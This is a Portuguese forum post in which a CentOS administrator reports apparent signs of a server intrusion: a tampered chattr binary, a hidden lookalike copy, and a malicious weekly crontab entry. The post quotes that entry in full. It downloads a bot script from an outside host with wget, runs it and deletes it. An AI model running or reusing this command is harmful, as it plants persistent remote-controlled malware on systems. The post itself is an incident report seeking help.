wgmadeira
(usa CentOS)
Enviado em 28/01/2015 - 20:44h
Prezados,
Resolvido, segue as observações.
Ao entrar na pasta /usr/bin/ notei que as permissões do arquivo chattr estavam erradas.
[root@SV01]# ls -l /usr/bin/chattr
---------- 1 root root 14136 Nov 22 2013 /usr/bin/chattr
E existia outro arquivo com um ponto no final (chattr.)
[root@SV01]# ls -l /usr/bin/chattr.
-rwxr-xr-x 1 root root 14136 Out 12 00:56 /usr/bin/chattr.
Com este arquivo consegui executar os comandos com sucesso:
[root@SV01]# /usr/bin/chattr. -ais /usr/bin/crontab
[root@SV01]# chmod 4755 /usr/bin/crontab
Porem algo ainda mais estranho ainda aconteceu, ao executar o comando "crontab -e" achei a seguinte linha no agendamento:
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
E ainda dentro da pasta tmp existia alguns arquivos que desconhecia.
[root@GVSV02 tmp]# ls -la
total 28
drwxrwxrwt. 4 root root 4096 Jan 29 21:35 .
dr-xr-xr-x. 29 root root 4096 Jan 28 18:26 ..
-rw------- 1 root root 12288 Jan 28 19:16 .fcr-YlrUtk.swp
drwxrwxrwt 2 root root 4096 Jan 28 18:26 .ICE-unix
drwxr-xr-x. 2 root root 4096 Jan 28 19:10 .webmin
Dentro do arquivo .fcr-YlrUtk.swp tinha essas linhas estranhas.
[root@SV01 tmp]# cat .fcr-YlrUtk.swp
U3210#"! Utadßÿÿξg-á½ ~}vjG4$## * * * * *# * * * * * us# * * * * * user-name command # * * * # * *# * * * * * user-name comman# * * * * * user-name co# * * * * * user-name command t# * * * * * user-name command# * * * * * user-name command to be e# * * * * * user-name command to be executed# | | # * * * * * user-name command to be executed# | | | | |# | | | | .---- d# * * * * *# * * * * * user-name command to be executed
Removi a linha no crontab, alterei a senha de root por segurança, limpei a pasta /tmp e instalei o Clamav Antivírus.
Vi em alguns fóruns que pode se tratar de uma invasão. Estou preocupado pois a senha é forte e tem firewall. O que realmente pode ter acontecido?